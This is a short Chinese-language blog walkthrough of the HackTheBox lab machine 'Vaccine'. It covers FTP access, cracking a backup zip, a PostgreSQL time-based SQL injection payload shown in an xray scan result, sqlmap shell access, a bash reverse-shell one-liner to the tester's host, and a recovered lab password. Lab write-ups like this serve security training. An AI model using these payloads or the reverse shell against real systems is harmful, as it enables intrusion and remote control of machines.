HackTheBox Starting point Vaccine .46

Posted by Mr.Be1ieVe on Monday, April 19, 2021

信息收集

扫描之后有ftp,ssh和web

联想到之前获得的ftp账户,输入进去登录后获得了backup.zip

使用Seclist的字典,通过爆破获得密码,成功登陆进的了后台

sql注入

获得登陆密码的md5,解开后登陆进后台跳转到dashboard

推测登陆页面sql为select * from table where name = Input,输入sport'+and+1=1,根据页面返回的报错信息ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%sport' and 1=1%' ^

xray扫描结果

[Vuln: sqldet]
Target           "http://10.10.10.46/dashboard.php?search=1"       
VulnType         "blind-based/default"                            
Payload          "1'/**/and(select'1'from/**/pg_sleep(2))>'0" 
Position         "query"                                       
ParamKey         "search"                                        
ParamValue       "1'/**/and(select'1'from/**/pg_sleep(2))>'0"   
std_dev          "5"                                          
sleep_time       "2000"                                       
p_time           "187"                                       
n_time           "2191"                                           
stat             "{\"normal\":{\"samples\":[193,187,200,194,184,194],\"avg\":192,\"std_dev\":5.196152422706632,\"sleep_time\":2},\"sleep_0_time\":187,\"quick_check\":{\"samples\":[2191],\"sleep\":2},\"verify\":{\"samples\":[3189,3193,3189],\"sleep\":3}}"                                                                                                
title            "Generic PostgreSQL time based case ['string']"                     
type             "time_based"                               
avg_time         "192"   

这里因为sqlmap的cookie弄错了绕了弯路。。配置对的sqlmap直接就能检测到sql注入并获得shell

查看/var/www/html/dashboard.php后获得密码P@s5w0rd!

获得os-shell之后反弹shell bash -c 'bash -i >& /dev/tcp/10.10.14.180/4444 0>&1'

sudo -l 列出经过安全策列允许的指令

将简单shell变成tty

SHELL=/bin/bash script -q /dev/null
python3 -c "import pty;pty.spawn('/bin/bash')"  

要点

ftp的使用

爆破密码

postgresql 注入和使用

sqlmap

apache的配置文件获取账密

使用vi提权

「真诚赞赏,手留余香」

Mr.Be1ieVe's Treasure

真诚赞赏,手留余香

使用微信扫描二维码完成支付